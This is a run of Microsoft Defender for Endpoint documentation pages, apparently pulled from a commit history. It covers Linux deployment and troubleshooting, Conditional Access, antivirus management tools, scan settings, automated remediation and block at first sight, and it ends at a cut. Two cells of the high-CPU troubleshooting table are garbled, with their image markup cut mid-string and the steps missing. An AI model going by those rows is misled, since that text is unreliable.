-High I/O workloads such as Postgres, OracleDB, Jira, and Jenkins might require other exclusions, depending on the amount of activity that is being processed (and monitored by Defender for Endpoint). It's best to follow guidance from non-Microsoft application providers for their exclusions if you experience performance degradation after installing Defender for Endpoint. Also keep in mind [Common Exclusion Mistakes for Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus).
-
-If you experience performance degradation, see the following resources:
--- [Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux](linux-support-perf.md).-- [Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux](troubleshoot-auditd-performance-issues.md).-
-## 11. Download the Microsoft Defender for Endpoint on Linux onboarding package
-
-For more information, see [download the onboarding package from Microsoft Defender portal](linux-install-manually.md#download-the-onboarding-package).
-
-> [!NOTE]
-> This download registers Microsoft Defender for Endpoint on Linux to send the data to your Microsoft Defender for Endpoint instance.
-
-After downloading this package, you can follow the [manual installation instructions](linux-install-manually.md) or use a Linux management platform to deploy and manage Defender for Endpoint on Linux.
-
-## 12. Ansible, Puppet, and Chef examples to manage Microsoft Defender for Endpoint on Linux
-
-Defender for Endpoint on Linux is designed to allow almost any management solution to easily deploy and manage Defender for Endpoint settings on Linux. A few common Linux management platforms are Ansible, Puppet, and Chef. The following documents contain examples on how to configure these management platforms to deploy and configure Defender for Endpoint on Linux.
-
-[Deploy Microsoft Defender for Endpoint on Linux with Puppet](linux-install-with-puppet.md)
-
-[Deploy Microsoft Defender for Endpoint on Linux with Ansible](linux-install-with-ansible.md)
-
-[Deploy Microsoft Defender for Endpoint on Linux with Chef](linux-deploy-defender-for-endpoint-with-chef.md)
-
-> [!NOTE]
-> Reboots are NOT required after installing or updating Microsoft Defender for Endpoint on Linux except when you're running auditD in immutable mode.
-
-### Deliver the scheduled scans cronjob setting
-
-Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux. For more information, see [Schedule an antivirus scan using Anacron in Microsoft Defender for Endpoint on Linux](schedule-antivirus-scan-in-mde.md).
-
-### Update Microsoft Defender for Endpoint on Linux agent cronjob settings
-
-Schedule an update of the Microsoft Defender for Endpoint on Linux. For more information, see, [Schedule an update of the Microsoft Defender for Endpoint on Linux](linux-update-mde-linux.md).
-
-## 13. Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux
-
-Learn how to troubleshoot issues that might occur during installation in [Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux](linux-support-install.md).
-
-## 14. Check resource utilization statistics
-
-Check performance statistics and compare to predeployment utilization compared to post-deployment.
-
-## 15. Verify communication with Microsoft Defender for Endpoint backend
-
-To verify the Microsoft Defender for Endpoint on Linux communication to the cloud with the current network settings, run the following connectivity test from the command line:
-
-```bash
-mdatp connectivity test
-```
-
-The following image displays the expected output from the test:
--
-For more information, see [Connectivity validation](linux-support-connectivity.md#run-the-connectivity-test).
-
-## 16. Investigate agent health issues
-
-Investigate agent health issues based on values returned when you run the `mdatp health` command. For more information, see, [Investigate agent health issues](health-status.md).
-
-## 17. Verify that you're able to get platform updates (agent updates)
-
-To verify Microsoft Defender for Endpoint on Linux platform updates, run the following command line:
-
-```bash
-sudo yum update mdatp
-```
-
-or
-
-```bash
-apt-get update mdatp
-```
-
-depending on your package manager.
-
-For more information, see [Device health and Microsoft Defender antimalware health report](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/new-device-health-reporting-for-microsoft-defender-for-endpoint/bc-p/3616205#M1963).
-
-To find the latest Broad channel release, visit [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md).
-
-### How to update Microsoft Defender for Endpoint on Linux
-
-Microsoft regularly publishes software updates to improve performance, security, and to deliver new features. To update Microsoft Defender for Endpoint on Linux. For more information, see [Deploy updates for Microsoft Defender for Endpoint on Linux](linux-updates.md#rhel-and-variants-centos-and-oracle-linux).
-
-> [!NOTE]
-> If you have Redhat's Satellite (akin to WSUS in Windows), you can get the updated packages from it.
-
-> [!TIP]
-> Automate the agent update on a monthly (Recommended) schedule by using a Cron job. For more information, see [schedule an update of the Microsoft Defender for Endpoint on Linux](linux-update-mde-linux.md).
-
-### Non-Windows endpoints
-
-With macOS and Linux, you could take a couple of systems and run in the Beta channel.
-
-> [!NOTE]
-> Ideally you should include one of each type of Linux system you are running in the Preview channel so that you are able to find compatibility, performance and reliability issues before the build makes it into the Current channel.
-
-The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in Beta are the first ones to receive updates and new features, followed later by Preview and lastly by Current.
--
-In order to preview new features and provide early feedback, it's recommended that you configure some devices in your enterprise to use either Beta or Preview.
-
-> [!WARNING]
-> Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
-
-## 18. Verify that you're able to get security intelligence updates (signatures/definition updates)
-
-To verify Microsoft Defender for Endpoint on Linux signatures/definition updates, run the following command line:
-
-`mdatp definitions update`
-
-For more information, see [New device health reporting for Microsoft Defender antimalware](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/new-device-health-reporting-for-microsoft-defender-for-endpoint/bc-p/3616205).
-
-## 19. Test detections
-
-To ensure that the device is correctly onboarded and reported to the service, run the following detection test:
--- Antimalware detections:-
- ```bash
- curl -o /tmp/eicar.com.txt https://www.eicar.org/download/eicar.com.txt
- ```
-
- If the detection doesn't show up, it could be that you have set "allowedThreats" to allow in preferences via Ansible or Puppet.
--- Endpoint detection and response (EDR) detections:
- For more information, see [Experience Microsoft Defender for Endpoint through simulated attacks](attack-simulations.md).
- If the detection doesn't show up, then it could be that we're missing event or alerts in portal. For more information, see [Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux](linux-support-events.md).
-- For more information about unified submissions in Microsoft Defender XDR and the ability to submit **False Positives** and **False Negatives** through the portal, see [Unified submissions in Microsoft Defender XDR now Generally Available! - Microsoft Tech Community](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unified-submissions-in-microsoft-365-defender-now-generally/ba-p/3270770).-
-## 20. Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux
-
-For more information, see, [Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux](linux-support-events.md).
-
-## 21. Troubleshoot High CPU utilization by ISVs, Linux apps, or scripts
-
-If you observe that third-party ISVs, internally developed Linux apps, or scripts run into high CPU utilization, you take the following steps to investigate the cause.
-
-1. Identify the thread or process that's causing the symptom.
-2. Apply further diagnostic steps based on the identified process to address the issue.
-
-### Step 1: Identify the Microsoft Defender for Endpoint on Linux thread causing the symptom
-
-Use the following syntaxes to help identify the process that is causing CPU overhead:
--- To get Microsoft Defender for Endpoint process ID causing the issue, run:-
- ```bash
- sudo top -c
- ```
--- To get more details on Microsoft Defender for Endpoint process, run:-
- ```bash
- sudo ps ax --no-headings -T -o user,pid,thcount,%cpu,sched,%mem,vsz,rss,tname,stat,start_time,time,ucmd,command |sort -nrk 3|grep mdatp
- ```
--- To identify the specific Microsoft Defender for Endpoint thread ID causing the highest CPU utilization within the process, run:-
- ```bash
- sudo ps -T -p <PID> >> Thread_with_highest_cpu_usage.log
- ```
-
- :::image type="content" source="media/cpu-utilization.png" alt-text="This is CPU utilization":::
-
-The following table lists the processes that might cause a high CPU usage:
-
-|Process name|Component used|MDE engine used|
-||||
-|wdavdaemon|FANotify| Antivirus & EDR|
-|wdavdaemon unprivileged||Antivirus engine|
-|wdavdaemon edr||EDR engine|
-|mdatp_audisp_plugin|audit framework (auditd)|Audit log ingestion|
-
-### Step 2: Apply further diagnostic steps based on the identified process
-
-Now that you've identified the process that is causing the high CPU usage, use the corresponding diagnostic guidance in the following section.
-
-For example, in the previous step, `wdavdaemon unprivileged` was identified as the process that was causing high CPU usage. Based on the result, you can apply the guidance to check the wdavdaemon unprivileged process.
-
-Use the following table to troubleshoot high CPU utilization:
-
-|Process name|Component used|Microsoft Defender for Endpoint engine used| Steps |
-|||||
-|wdavdaemon|FANotify | Antivirus & EDR|- Download and run Microsoft Defender for Endpoint Client Analyzer. For more information, see [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md). <br/><br/> - Collect diagnostic data using the [Client analyzer tool](https://aka.ms/xMDEClientAnalyzerBinary).<br/><br/> - Open a CSS support case with Microsoft. For more information, see [CSS security support case](/mem/get-support).
-|wdavdaemon unprivileged|N/A|Antivirus engine| The following diagram shows the workflow and steps required in order to add Antivirus exclusions. <br/><br/> :::image type="content" source="mediEClientAnalyzerBinary).<br/><br/> - Open a CSS support case with Microsoft. For more information, see [CSS security support case](/mem/get-support).
-|wdavdaemon edr| N/A |EDR engine|The following diagram shows the workflow and steps to troubleshoot wdavedaemon_edr process issues. <br/><br/> :::image type="content" source="mediEClientAnalyzerBinary).<br/><br/> - Open a CSS support case with Microsoft. For more information, see [CSS security support case](/mem/get-support).
-|mdatp_audisp_plugin|Audit framework|Audit log ingestion| See [Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux](troubleshoot-auditd-performance-issues.md).
-
-## 22. Uninstall your non-Microsoft solution
-
-If at this point you have:
--- Onboarded your organization's devices to Defender for Endpoint, and-- Microsoft Defender Antivirus is installed and enabled,-
-Then your next step is to uninstall your non-Microsoft antivirus, antimalware, and endpoint protection solution. When you uninstall your non-Microsoft solution, make sure to update your configuration to switch from Passive Mode to Active if you set Defender for Endpoint to Passive mode during the installation or configuration.
-
-## Diagnostic and troubleshooting resources
--- [Troubleshoot Microsoft Defender for Endpoint on Linux installation issues](linux-support-install.md).-- [Identify where to find detailed logs for installation issues](linux-resources.md#log-installation-issues).-- [Troubleshooting steps for environments without proxy or with transparent proxy](linux-support-connectivity.md#troubleshooting-steps-for-environments-without-proxy-or-with-transparent-proxy).-- [Troubleshooting steps for environments with static proxy](linux-support-connectivity.md#troubleshooting-steps-for-environments-with-static-proxy).-- [Collect diagnostic information](linux-resources.md#collect-diagnostic-information).-- [Uninstall Defender for Endpoint on Linux](linux-resources.md#uninstall-defender-for-endpoint-on-linux).-- [Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux](linux-support-perf.md).-- [Troubleshoot AuditD performance issues with Microsoft Defender for Endpoint on Linux](troubleshoot-auditd-performance-issues.md).-
-## Advanced Microsoft Defender for Endpoint capabilities
--- [Enhanced antimalware engine capabilities on Linux and macOS](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/enhanced-antimalware-engine-capabilities-for-linux-and-macos/ba-p/3292003)--- [Boost protection of Linux estate with behavior monitoring](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/boost-protection-of-your-linux-estate-with-behavior-monitoring/ba-p/2909320)-
- > [!NOTE]
- > The behavior monitoring functionality complements existing strong content-based capabilities, however you should carefully evaluate this feature in your environment before deploying it broadly since enabling behavioral monitoring consumes more resources and may cause performance issues.
--- [Unified submissions in Microsoft Defender XDR](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unified-submissions-in-microsoft-365-defender-now-generally/ba-p/3270770)--- [Introducing the new alert suppression experience](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/introducing-the-new-alert-suppression-experience-now-in-public/ba-p/3562719)--- [Announcing live response for macOS and Linux](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-live-response-for-macos-and-linux/ba-p/2864397)-
-## References
--- [Add a tag or group ID](linux-preferences.md#add-tag-or-group-id-to-the-configuration-profile)--- [Privacy for Microsoft Defender for Endpoint on Linux](linux-privacy.md)--- [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md)-
security Conditional Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/conditional-access.md
- Title: Enable Conditional Access to better protect users, devices, and data
-description: Enable Conditional Access to prevent applications from running if a device is considered at risk and an application is determined to be non-compliant.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Enable Conditional Access to better protect users, devices, and data
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-conditionalaccess-abovefoldlink)
-
-Conditional Access is a capability that helps you better protect your users and enterprise information by making sure that only secure devices have access to applications.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4byD1]
-
-With Conditional Access, you can control access to enterprise information based on the risk level of a device. This helps keep trusted users on trusted devices using trusted applications.
-
-You can define security conditions under which devices and applications can run and access information from your network by enforcing policies to stop applications from running until a device returns to a compliant state.
-
-The implementation of Conditional Access in Defender for Endpoint is based on Microsoft Intune (Intune) device compliance policies and Microsoft Entra Conditional Access policies.
-
-The compliance policy is used with Conditional Access to allow only devices that fulfill one or more device compliance policy rules to access applications.
-
-## Understand the Conditional Access flow
-
-Conditional Access is put in place so that when a threat is seen on a device, access to sensitive content is blocked until the threat is remediated.
-
-The flow begins with devices being seen to have a low, medium, or high risk. These risk determinations are then sent to Intune.
-
-Depending on how you configure policies in Intune, Conditional Access can be set up so that when certain conditions are met, the policy is applied.
-
-For example, you can configure Intune to apply Conditional Access on devices that have a high risk.
-
-In Intune, a device compliance policy is used with Microsoft Entra Conditional Access to block access to applications. In parallel, an automated investigation and remediation process is launched.
-
- A user can still use the device while the automated investigation and remediation is taking place, but access to enterprise data is blocked until the threat is fully remediated.
-
-To resolve the risk found on a device, you need to return the device to a compliant state. A device returns to a compliant state when there's no risk seen on it.
-
-There are three ways to address a risk:
-
-1. Use Manual or automated remediation.
-2. Resolve active alerts on the device. This removes the risk from the device.
-3. You can remove the device from the active policies and consequently, Conditional Access won't be applied on the device.
-
-Manual remediation requires a secops admin to investigate an alert and address the risk seen on the device. The automated remediation is configured through configuration settings provided in the following section, [Configure Conditional Access](configure-conditional-access.md).
-
-When the risk is removed either through manual or automated remediation, the device returns to a compliant state and access to applications is granted.
-
-The following example sequence of events explains Conditional Access in action:
-
-1. A user opens a malicious file and Defender for Endpoint flags the device as high risk.
-2. The high risk assessment is passed along to Intune. In parallel, an automated investigation is initiated to remediate the identified threat. A manual remediation can also be done to remediate the identified threat.
-3. Based on the policy created in Intune, the device is marked as not compliant. The assessment is then communicated to Microsoft Entra ID by the Intune Conditional Access policy. In Microsoft Entra ID, the corresponding policy is applied to block access to applications.
-4. The manual or automated investigation and remediation is completed and the threat is removed. Defender for Endpoint sees that there's no risk on the device and Intune assesses the device to be in a compliant state. Microsoft Entra ID applies the policy, which allows access to applications.
-5. Users can now access applications.
-
-## Related topic
--- [Configure Conditional Access in Microsoft Defender for Endpoint](configure-conditional-access.md)
security Configuration Management Reference Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configuration-management-reference-microsoft-defender-antivirus.md
- Title: Manage Microsoft Defender Antivirus in your business
-description: Learn how to use Group Policy, Configuration Manager, PowerShell, WMI, Intune, and the command line to manage Microsoft Defender Antivirus
---- Previously updated : 02/18/2024------- m365-security-- tier2-- mde-ngp--
-# Manage Microsoft Defender Antivirus in your business
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-- Windows Server-
-> [!TIP]
-> For the best experience, please choose 1 method for configuring the Microsoft Defender Antivirus policies.
-
-> [!IMPORTANT]
-> Group Policy (GPO) wins over Microsoft Configuration Manager wins over Microsoft Intune wins over Microsoft Defender for Endpoint Security Configuration Management or Powershell or WMI or MpCmdRun.exe.
-You can manage and configure Microsoft Defender Antivirus with the following tools:
-- [Microsoft Defender for Endpoint Security Configuration Management](/mem/intune/protect/mde-security-integration)-- [Microsoft Intune](/mem/intune/protect/endpoint-security-antivirus-policy)-- [Microsoft Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-protection-configure)-- [Group Policy](./use-group-policy-microsoft-defender-antivirus.md)-- [PowerShell cmdlets](./use-powershell-cmdlets-microsoft-defender-antivirus.md)-- [Windows Management Instrumentation (WMI)](./use-wmi-microsoft-defender-antivirus.md)-- The [Microsoft Malware Protection Command Line Utility](./command-line-arguments-microsoft-defender-antivirus.md) (referred to as the *mpcmdrun.exe* utility)-
-The following articles provide further information, links, and resources for using these tools to manage and configure Microsoft Defender Antivirus.
-
-|Article|Description|
-|:|:|
-|[Manage Microsoft Defender Antivirus with Microsoft Defender for Endpoint Security Configuration Management](/mem/intune/protect/mde-security-integration)|Information about using the Microsoft Defender for Endpoint Security Configuration Management to configure, manage, and report, Microsoft Defender Antivirus|
-|[Manage Microsoft Defender Antivirus with Microsoft Intune and Microsoft Endpoint Configuration Manager](use-intune-config-manager-microsoft-defender-antivirus.md)|Information about using Intune and Configuration Manager to deploy, manage, report, and configure Microsoft Defender Antivirus|
-|[Manage Microsoft Defender Antivirus with Group Policy settings](use-group-policy-microsoft-defender-antivirus.md)|List of all Group Policy settings located in ADMX templates|
-|[Manage Microsoft Defender Antivirus with PowerShell cmdlets](use-powershell-cmdlets-microsoft-defender-antivirus.md)|Instructions for using PowerShell cmdlets to manage Microsoft Defender Antivirus, plus links to documentation for all cmdlets and allowed parameters|
-|[Manage Microsoft Defender Antivirus with Windows Management Instrumentation (WMI)](use-wmi-microsoft-defender-antivirus.md)|Instructions for using WMI to manage Microsoft Defender Antivirus, plus links to documentation for the WMIv2 APIs (including all classes, methods, and properties)|
-|[Manage Microsoft Defender Antivirus with the MpCmdRun.exe command-line tool](command-line-arguments-microsoft-defender-antivirus.md)|Instructions on using the dedicated command-line tool to manage and use Microsoft Defender Antivirus|
-
-If running high CPU in Antimalware Service Executable | Microsoft Defender Antivirus Service | MsMpEng.exe, please review:
-- [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md)
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Configure Advanced Scan Types Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-advanced-scan-types-microsoft-defender-antivirus.md
- Title: Configure scanning options for Microsoft Defender Antivirus
-description: You can configure Microsoft Defender Antivirus to scan email storage files, back-up or reparse points, network files, and archived files (such as .zip files).
------- Previously updated : 02/16/2024--- m365-security-- tier2-- mde-ngp---
-# Configure Microsoft Defender Antivirus scanning options
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows -
-## Use Microsoft Intune to configure scanning options
-
-For more information, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure) and [Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune](/intune/device-restrictions-windows-10#microsoft-defender-antivirus).
-
-## Use Microsoft Configuration Manager to configure scanning options
-
-For details on configuring Microsoft Configuration Manager (current branch), see [How to create and deploy antimalware policies: Scan settings](/configmgr/protect/deploy-use/endpoint-antimalware-policies#scan-settings).
-
-## Use Group Policy to configure scanning options
-
-> [!TIP]
-> Download the Group Policy Reference Spreadsheet, which lists the policy settings for computer and user configurations that are included in the Administrative template files delivered with for Windows. You can configure refer to the spreadsheet when you edit Group Policy Objects. <br/><br/> Here are the most recent versions:
-> - [Group Policy Settings Reference Spreadsheet for Windows 10 May 2020 Update (2004)](https://www.microsoft.com/download/details.aspx?id=101451)
-> - [Group Policy Settings Reference Spreadsheet for Windows 11 October 2021 Update (21H2)](https://www.microsoft.com/download/details.aspx?id=103506)
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc731212(v=ws.11)).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. In the **Group Policy Management Editor** go to **Computer configuration** and click **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus**, and then select a location (refer to [Settings and locations](#settings-and-locations) in this article).
-
-5. Edit the policy object.
-
-6. Click **OK**, and repeat for any other settings.
-
-### Settings and locations
-
-|Policy item and location|Default setting <br/>(if not configured)|PowerShell `Set-MpPreference` parameter <br/>or WMI property for `MSFT_MpPreference` class|
-||||
-|Email scanning <br/> **Scan** \> **Turn on e-mail scanning**<br/>See [Email scanning limitations](#email-scanning-limitations) (in this article)|Disabled|`-DisableEmailScanning`|
-| Script scanning | Enabled | This policy setting allows you to configure script scanning. If you enable or do not configure this setting, script scanning is enabled. <br/><br/>See [Defender/AllowScriptScanning](/windows/client-management/mdm/policy-csp-defender) |
-|Scan [reparse points](/windows/win32/fileio/reparse-points) <br/> **Scan** \> **Turn on reparse point scanning**|Disabled|Not available <br/>See [Reparse points](/windows/win32/fileio/reparse-points)|
-|Scan mapped network drives<br/>**Scan** \> **Run full scan on mapped network drives**|Disabled|`-DisableScanningMappedNetworkDrivesForFullScan`|
-|Scan archive files (such as .zip or .rar files). <br/>**Scan** \> **Scan archive files**|Enabled|`-DisableArchiveScanning` <br/><br/>The [extensions exclusion list](configure-extension-file-exclusions-microsoft-defender-antivirus.md) will take precedence over this setting.|
-|Scan files on the network <br/>**Scan** \> **Scan network files**|Enabled|`-DisableScanningNetworkFiles`|
-|Scan packed executables<br/>**Scan** \> **Scan packed executables**|Enabled|Not available <br/><br/>Scan packed executables were removed from the following templates:<br/>- Administrative Templates (.admx) for Windows 11 2022 Update (22H2)<br/>- Administrative Templates (.admx) for Windows 11 October 2021 Update (21H2)|
-|Scan removable drives during full scans only<br/>**Scan** \> **Scan removable drives**|Disabled|`-DisableRemovableDriveScanning`|
-|Specify the level of subfolders within an archive folder to scan <p>**Scan** \> **Specify the maximum depth to scan archive files**|0|Not available|
-|Specify the maximum CPU load (as a percentage) during a scan. <p> **Scan** \> **Specify the maximum percentage of CPU utilization during a scan**|50|`-ScanAvgCPULoadFactor`<br/><br/> The maximum CPU load is not a hard limit, but is guidance for the scanning engine to not exceed the maximum on average. Manual scans ignore this setting and run without any CPU limits.|
-|Specify the maximum size (in kilobytes) of archive files that should be scanned.<br/>**Scan** \> **Specify the maximum size of archive files to be scanned**|No limit|Not available <br/><br/>The default value of 0 applies no limit|
-|Configure low CPU priority for scheduled scans<br/>**Scan** \> **Configure low CPU priority for scheduled scans**|Disabled|Not available|
-
-> [!NOTE]
-> If real-time protection is turned on, files are scanned before they are accessed and executed. The scanning scope includes all files, including files on mounted removable media, such as USB drives. If the device performing the scan has real-time protection or on-access protection turned on, the scan also includes network shares.
-
-## Use PowerShell to configure scanning options
-
-For more information on how to use PowerShell with Microsoft Defender Antivirus, see the following articles:
--- [Manage Microsoft Defender Antivirus with PowerShell cmdlets](use-powershell-cmdlets-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus cmdlets](/powershell/module/defender/)-
-## Use WMI to configure scanning options
-
-See [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-## Email scanning limitations
-
-Email scanning enables scanning of email files used by Outlook and other mail clients during on-demand and scheduled scans. Embedded objects within email (such as attachments and archived files) are also scanned. The following file format types can be scanned and remediated:
--- DBX-- MBX-- MIME-
-PST files used by Outlook 2003 or older (where the archive type is set to non-unicode) are also scanned, but Microsoft Defender Antivirus cannot remediate threats that are detected inside PST files.
-
-If Microsoft Defender Antivirus detects a threat inside an email message, the following information is displayed to assist you in identifying the compromised email so you can remediate the threat manually:
--- Email subject-- Attachment name-
-## Scanning mapped network drives
-
-On any OS, only the network drives that are mapped at system level, are scanned. User-level mapped network drives aren't scanned. User-level mapped network drives are those that a user maps in their session manually and using their own credentials.
-
security Configure Automated Investigations Remediation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation.md
- Title: Configure automated investigation and remediation capabilities
-description: Set up your automated investigation and remediation capabilities in Microsoft Defender for Endpoint.
-------- m365-security-- tier3-- mde-edr-- Previously updated : 02/16/2024--
-# Configure automated investigation and remediation capabilities in Microsoft Defender for Endpoint
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-If your organization is using [Defender for Endpoint](/windows/security/threat-protection/) (or [Defender for Business](../defender-business/mdb-overview.md)), [automated investigation and remediation capabilities](/microsoft-365/security/defender-endpoint/automated-investigations) can save your security operations team time and effort. As outlined in [this blog post](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/enhance-your-soc-with-microsoft-defender-atp-automatic/ba-p/848946), these capabilities mimic the ideal steps that a security analyst takes to investigate and remediate threats. [Learn more about automated investigation and remediation](/microsoft-365/security/defender-endpoint/automated-investigations).
-
-If you're using Defender for Endpoint, you can specify an automation level so that when a threat is detected on a device, the entity can be remediated automatically or only upon approval by your security team. You can configure automated investigation and remediation with device groups.
-
-> [!NOTE]
-> In Defender for Business, automated investigation is configured automatically. See [advanced features](/microsoft-365/security/defender-business/mdb-configure-security-settings#review-settings-for-advanced-features).
-
-## Set up device groups
-
-1. In the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)), on the **Settings** page, under **Permissions**, select **Device groups**.
-
-2. Select **+ Add device group**.
-
-3. Create at least one device group, as follows:
-
- - Specify a name and description for the device group.
- - In the **Automation level list**, select a level, such as **Full - remediate threats automatically**. The automation level determines whether remediation actions are taken automatically, or only upon approval. To learn more, see [Automation levels in automated investigation and remediation](automation-levels.md).
- - In the **Members** section, use one or more conditions to identify and include devices.
-
-4. Select **Done** when you're finished setting up your device group.
-
-> [!NOTE]
-> The **Automated Investigation** option has been removed from the advanced features setting in Defender for Endpoint. Automated investigation is now enabled by default.
-
-## Next steps
--- [Visit the Action Center to view pending and completed remediation actions](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center)-- [Review and approve pending actions](/microsoft-365/security/defender-endpoint/manage-auto-investigation)-
-## See also
--- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-- [Automation levels in automated investigation and remediation](automation-levels.md)
security Configure Block At First Sight Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus.md
- Title: Enable block at first sight to detect malware in seconds
-description: Turn on the block at first sight feature to detect and block malware within seconds.
------ Previously updated : 02/16/2024----- m365-security-- tier2-- mde-ngp--
-# Turn on block at first sight
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus -
-**Platforms**
-- Windows-
-This article describes an antivirus/antimalware feature known as "block at first sight", and describes how to enable block at first sight for your organization.
-
-> [!TIP]
-> This article is intended for enterprise admins and IT Pros who manage security settings for organizations. If you are not an enterprise admin or IT Pro but you have questions about block at first sight, see the [Not an enterprise admin or IT Pro?](#not-an-enterprise-admin-or-it-pro) section.
-
-## What is "block at first sight"?
-
-Block at first sight is a threat protection feature of next-generation protection that detects new malware and blocks it within seconds. Block at first sight is enabled when certain security settings are enabled:
--- [Cloud protection](cloud-protection-microsoft-defender-antivirus.md) is turned on;-- [Sample submission](cloud-protection-microsoft-antivirus-sample-submission.md) is configured for samples to be sent automatically; and-- [Microsoft Defender Antivirus is up to date](microsoft-defender-antivirus-updates.md) on devices.-
-In most enterprise organizations, the settings needed to enable block at first sight are configured with Microsoft Defender Antivirus deployments. See [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md).
-
-## How it works
-
-When Microsoft Defender Antivirus encounters a suspicious but undetected file, it queries our cloud protection backend. The cloud backend applies heuristics, machine learning, and automated analysis of the file to determine whether the files are malicious or not a threat.
-
-Microsoft Defender Antivirus uses multiple detection and prevention technologies to deliver accurate, intelligent, and real-time protection.
--
-> [!TIP]
-> To learn more, see [(Blog) Get to know the advanced technologies at the core of Microsoft Defender for Endpoint next-generation protection](https://www.microsoft.com/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/).
-
-## A few things to know about block at first sight
